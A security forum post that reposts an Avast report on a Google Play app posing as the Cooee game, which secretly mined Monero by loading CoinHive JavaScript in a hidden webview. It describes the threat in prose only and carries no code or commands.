Cryptocurrency mining malware sneaks onto Google Play

LASER_oneXM

LASER_oneXM

Level 37
Thread author
Verified
Top Poster
Well-known
Feb 4, 2016
2,520
Avast finds and detects an app that mines the Monero cryptocurrency

Cryptocurrency mining is a hot and trending topic at the moment, especially since websites have recently resorted to mining cryptocurrency instead of showing ads. As with many malicious trends, the cybercriminals have quickly moved from PC to mobile. This week, we found an app that contains cryptocurrency mining capabilities on the Google Play Store, masquerading as the Cooee game. Between 1,000 and 5,000 users downloaded the app. We detect the malware as JSMiner and we informed Google of the app yesterday.

XCooeep_Google_Play_app.png


XCooeep_Google_Play_app_details.png


Cryptocurrency mining
It’s important to understand that mining cryptocurrency is actually a legit business. Scaling enough to maximize profit requires strong computing power, though, which is why some miners run huge server farms to mine Bitcoin or other cryptocurrencies, such as Litecoin, Ethereum, or Monero. Constructing and maintaining the infrastructure and accessing the electricity necessary to run them requires enormous financial investment.

Since mining cryptocurrencies is expensive, miners are resorting to abusing the processing power of other devices and are spreading mining programs through apps and websites. We consider cryptocurrency mining malicious when it is done without the user’s permission, which is what happened in this case.
Click to expand...
Let the mining begin… or not

In order for the malware to start the process of mining, all the user needs to do after downloading the app, is click the button below. The button’s actual main purpose should be to allow the user to log into the Cooee Club 3D Chat Community panel.

XCOOEEP_Button.png


After clicking the button above, a new webview is opened in the background. This allows the malware to load CoinHive Javascript code from an external host address. The mining then begins.

Once the mining process begins, the phone will heat up, as CPU utilization is very high.

The malware mines the cryptocurrency Monero. The end goal for the cybercriminals is financial gain, but what the cybercriminals don’t seem to realize is that mining on a mobile device cannot deliver much profit. Mobile devices don’t have the processing power that PCs have to really successfully mine and on top of that, mobile devices often have limited battery life, because they are not constantly being charged, thus limiting the mining time.
Click to expand...
 
  • Like
Reactions: vemn and harlan4096
You must log in or register to reply here.

Similar threads

vtqhtr413
    • Like
    • HaHa
Crypto Opinions & News Hacker spins up 1 million virtual servers to mine crypto
Replies
1
Views
705
Crypto News
MuzzMelbourne
MuzzMelbourne
silversurfer
    • Like
    • +Reputation
Verblecon malware loader used in stealthy crypto mining attacks
Replies
0
Views
1,001
News Archive
silversurfer
silversurfer
vtqhtr413
    • Like
    • +Reputation
    • Wow
Malware News Pirated Microsoft Office delivers malware cocktail on systems
Replies
4
Views
2,290
Security News
Marko :)
Marko :)

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top